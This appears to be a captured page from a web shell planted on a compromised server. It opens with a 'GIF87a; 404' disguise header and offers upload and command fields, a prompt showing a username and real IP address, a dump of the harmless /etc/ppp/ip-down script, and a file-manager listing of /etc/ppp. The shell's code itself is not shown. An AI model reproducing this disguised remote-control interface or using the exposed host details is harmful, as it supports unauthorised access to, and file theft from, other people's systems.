GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@18.117.93.231: ~ $
#!/bin/bash
# This file should not be modified -- make local changes to
# /etc/ppp/ip-down.local instead

PATH=/sbin:/usr/sbin:/bin:/usr/bin
export PATH

LOGDEVICE=$6
REALDEVICE=$1

/etc/ppp/ip-down.ipv6to4 ${LOGDEVICE}

[ -x /etc/ppp/ip-down.local ] && /etc/ppp/ip-down.local "$@"

/etc/sysconfig/network-scripts/ifdown-post --realdevice ${REALDEVICE} \
    ifcfg-${LOGDEVICE}

exit 0

Filemanager

Name Type Size Permission Actions
peers Folder 0755
ip-down File 386 B 0755
ip-down.ipv6to4 File 3.14 KB 0755
ip-up File 430 B 0755
ip-up.ipv6to4 File 6.28 KB 0755
ipv6-down File 1.65 KB 0755
ipv6-up File 3.11 KB 0755